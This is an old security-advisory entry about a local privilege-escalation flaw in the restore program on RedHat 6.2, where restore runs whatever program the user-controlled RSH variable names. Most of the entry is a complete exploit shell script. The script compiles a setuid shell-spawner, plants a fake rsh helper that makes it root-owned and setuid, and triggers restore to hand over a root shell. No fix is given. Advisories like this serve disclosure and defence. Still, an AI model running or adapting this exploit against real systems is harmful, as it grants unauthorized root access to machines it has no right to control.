COMMAND

    restore

SYSTEMS AFFECTED

    RedHat 6.2

PROBLEM

    'fish stiqz' found following.   Well, restore has the same problem
    as dump as described at:

        http://oliver.efri.hr/~crv/security/bugs/Linux/dump3.html

    The code:

    #!/bin/sh
    #
    # Exploits a stupid bug in redhat 6.2's (others..) restore program.
    # restore version 0.4b15 executes a program which is found in
    # a user modifiable environment variable (RSH).
    #
    # Have fun!
    #        - fish
    #
    # Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs,
    #	     ralph, jen, madspin, hampton, ego, als, scorch.
    #
    #          Cause we da pimpz of #code! (not ef/dal.. etc)
    #                     (irc > irl ? werd : lame)
    #
    # WERD to the async, isolated, expedience, mindsong, and analog crews
    #
    #
    # #TelcoNinjas can eat it cause they suck hardc0re
    # #TelcoNinjas == #smurfkiddies
    #
    
    echo "[spl0it]: Starting."
    echo -n "[spl0it]: creating shell spawn... "
    
    echo "#include <stdio.h>"                        > cool.c
    echo "int main(void) { "                        >> cool.c
    echo "    setuid(0);"                           >> cool.c
    echo "    setgid(0);"                           >> cool.c
    echo "    execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c
    echo "    return 0;"                            >> cool.c
    echo "}"                                        >> cool.c
    
    echo -e "\t\t\tdone"
    
    echo -n "[sploit]: Compiling shell spawn... "
    gcc -o cool cool.c
    echo -e "\t\t\tdone"
    
    
    echo -n "[sploit]: Creating fake rsh program... "
    
    cat > execute_me << EOF
    #!/bin/sh
    chown root: cool
    chmod 4777 cool
    EOF
    
    chmod +x execute_me
    echo -e "\t\t\tdone"
    
    
    # now executing the dump command
    echo "[spl0it]: Beginning exploitation: "
    export TAPE=garbage:garbage
    export RSH=./execute_me
    /sbin/restore -i
    
    
    # Exec'n the r00t sh3ll!
    echo -n "[spl0it]: Waiting 4 seconds for suid shell... "
    sleep 4
    echo -e "\t\tdone"
    
    if [ ! -u ./cool ]; then
      echo "[spl0it]: Hmm it didn't work.. Better luck next time eh"
      echo "[spl0it]: Check ./cool anyway =)"
      exit 0
    fi
    
    echo "[spl0it]: It Worked! suid shell is now ./cool"
    echo "[spl0it]: Entering suid shell..."
    ./cool
    exit 0

SOLUTION

    Nothing yet.